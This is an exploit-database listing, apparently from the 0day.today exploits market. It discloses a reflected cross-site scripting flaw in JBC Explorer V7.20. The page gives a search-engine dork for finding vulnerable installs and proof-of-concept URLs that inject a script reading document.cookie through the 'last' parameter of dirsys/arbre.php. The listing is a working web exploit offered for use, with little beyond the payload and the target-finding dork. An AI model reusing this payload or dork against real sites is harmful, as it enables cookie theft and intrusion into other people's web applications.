[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Explorer V7.20 Cross Site Scripting Vulnerability

Author
Metropolis
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10347
Category
web applications
Date add
20-12-2009
Platform
unsorted
=================================================
Explorer V7.20 Cross Site Scripting Vulnerability
=================================================

###########################################
#
# Script Name : Explorer V7.20
#
# Version :  V7.20 Release Candidate 1 REV A
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Discovered : 20 December 2009
#
# Download app : http://www.jbc-explorer.info/?action=download&download=16
#
# Dork : JBC explorer [ by Psykokwak & XaV ]
#
###########################################
  
PoC :
  
http://[target]/[path]/dirsys/arbre.php?0=search&last=1[Xss]
  
example :
  
http://[target]/[path]/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>
  
local Example :
  
http://localhost/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>



#  0day.today [2024-06-30]  #